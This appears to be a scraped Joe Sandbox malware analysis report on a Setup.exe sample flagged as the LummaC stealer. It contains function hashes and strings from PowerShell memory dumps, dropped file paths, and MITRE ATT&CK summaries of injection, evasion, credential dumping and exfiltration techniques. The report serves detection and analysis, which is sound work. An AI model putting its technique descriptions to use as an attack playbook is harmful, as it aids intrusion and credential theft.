Opcode Fuzzy Hash: ca54dc88309d33253278c2fc786a5e1d45a0d0d79ee38b8b09de162dc4444f88
Instruction Fuzzy Hash: F6212C78A042499FCB04CF9DD5809AEFBF5FF89310B1481AAD859AB312C735EC41CBA0

Function 03392AAE Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2f9c51ee3c77355f0d25dd2c22ef5bc07a990ec526747b889a442c06e25a56
Instruction ID: 5a46595cda175d15ce1bff94fe491de0091d1b55011687772db60f18b1a95c69
Opcode Fuzzy Hash: da2f9c51ee3c77355f0d25dd2c22ef5bc07a990ec526747b889a442c06e25a56
Instruction Fuzzy Hash: C321D574A00619DFCB04CF99C980AAAFBF5FF48310B1485A9E909E7361C731EC51CBA0

Function 033950E6 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2952179964.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_3390000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57443ffb4c81fa3014244be81648404c69a6ccc9938b397cf7ee647ccd2e8e8
Instruction ID: 44a904cd0408e8453b07a3cc2a1d3ed33564c0c47c066550831626558f6abba3
Opcode Fuzzy Hash: f57443ffb4c81fa3014244be81648404c69a6ccc9938b397cf7ee647ccd2e8e8
Instruction Fuzzy Hash: 84210474A00206DFDB14CF58C5849AAFBF5FF88310B2585A9D919EB755C731EC82CBA0

Function 0318D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2951710196.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_318d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e50c6eecf637b38c568e1448b7b5ed82ff27150b1e444e4362799c863a70d8
Instruction ID: e0618cdea97c799dedeca15fd2ec3d7f60bd9af8de7e2875f3052900ff9d0c18
Opcode Fuzzy Hash: 73e50c6eecf637b38c568e1448b7b5ed82ff27150b1e444e4362799c863a70d8
Instruction Fuzzy Hash: CB01F7311053449BE720EB15ED84B67FF9CEF4A324F1CC469ED480A286C7799841CEB9

Function 0318D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2951710196.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_318d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924dc2ace0b6479c6532355121aed7091e072633255aefd3a1ba3ef999838425
Instruction ID: 18113a3a555e2f2c30f4877fb545100638e0464123d31ac6cd737aa8a4c427b2
Opcode Fuzzy Hash: 924dc2ace0b6479c6532355121aed7091e072633255aefd3a1ba3ef999838425
Instruction Fuzzy Hash: D001407100E3C09FD7128B259C94B52BFB8EF47224F1D81DBD9888F2A7C2695848CB76

Non-executed Functions

Function 079108A0 Relevance: 9.1, Strings: 7, Instructions: 332COMMON

Download Yara Rule

Strings

$]q, xrefs: 07910AB4
4']q, xrefs: 079109AE
4']q, xrefs: 079109A2
$]q, xrefs: 07910AA8
tP]q, xrefs: 07910AF9
$]q, xrefs: 07910A82
tP]q, xrefs: 07910AED

Memory Dump Source

Source File: 00000011.00000002.2959694036.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
API String ID: 0-108373575
Opcode ID: dd59adcf916218f59b01f38fda50c93d4f0d89e7843ffd3f500783589b310666
Instruction ID: 97ebb4ae7e365ac5a408febe3195b9596143e3ab8aae4a553e8a19e56cb736a5
Opcode Fuzzy Hash: dd59adcf916218f59b01f38fda50c93d4f0d89e7843ffd3f500783589b310666
Instruction Fuzzy Hash: 01A19BB174831A8FDB258A7C845077ABBF9DFC2218F14847BD445CB292DA37C8A1C3A1

Function 079114E8 Relevance: 6.4, Strings: 5, Instructions: 190COMMON

Download Yara Rule

Strings

4']q, xrefs: 07911592
$]q, xrefs: 0791169A
4']q, xrefs: 0791159E
$]q, xrefs: 079116A6
$]q, xrefs: 0791166F

Memory Dump Source

Source File: 00000011.00000002.2959694036.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 3bba4ab30478a5d9def310140a2a13bf5f98718ebd0982b8ecb23bc0a6628aaf
Instruction ID: eceeb64bfe9d0d1265a96d6dfadd50672d5b7e4a881792f97ba569743e3ececd
Opcode Fuzzy Hash: 3bba4ab30478a5d9def310140a2a13bf5f98718ebd0982b8ecb23bc0a6628aaf
Instruction Fuzzy Hash: 7F517EB178430EAFCB254A6D8810367BBF9EFC2215F18847BD646CB251DA36C861C791

Function 07913518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07913580
$]q, xrefs: 07913546
$]q, xrefs: 0791352A
$]q, xrefs: 07913574

Memory Dump Source

Source File: 00000011.00000002.2959694036.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 993f6fc0801aed28cc3588eda544164300f9e76f27f4552d5dc4ab069a4e0523
Instruction ID: 74889a817ca8a0ee54ca0b0e84a31e1892bf9459d3850bdaacc398c038c17ad2
Opcode Fuzzy Hash: 993f6fc0801aed28cc3588eda544164300f9e76f27f4552d5dc4ab069a4e0523
Instruction Fuzzy Hash: 2E213BB131030A5BDB24557E9861B27BFFE9FC1F19F24883A990DCB281DD75C8158361

Function 07910571 Relevance: 5.1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

Strings

4']q, xrefs: 079105DB
$]q, xrefs: 079105BA
$]q, xrefs: 079105C6
4']q, xrefs: 079105E7

Memory Dump Source

Source File: 00000011.00000002.2959694036.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7910000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: 4ccbaf8f6d2ad0da390346c19f73b021159ba8a46ede7d1d2a8d4f1d8bb774b0
Instruction ID: f8750bbc0ab9c7195cc103f721a55e764affec8fdf86a13181e7359187044b2e
Opcode Fuzzy Hash: 4ccbaf8f6d2ad0da390346c19f73b021159ba8a46ede7d1d2a8d4f1d8bb774b0
Instruction Fuzzy Hash: C001267170D3994FC73F962D18305656FB69BC292471908A7C081DF287CD278D8683A7

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\v

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Achieved

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Affects

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Argentina

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cdt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Computing

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Determining

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Documentation

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Golf

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hentai

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Indians

Windows Analysis Report
Setup.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre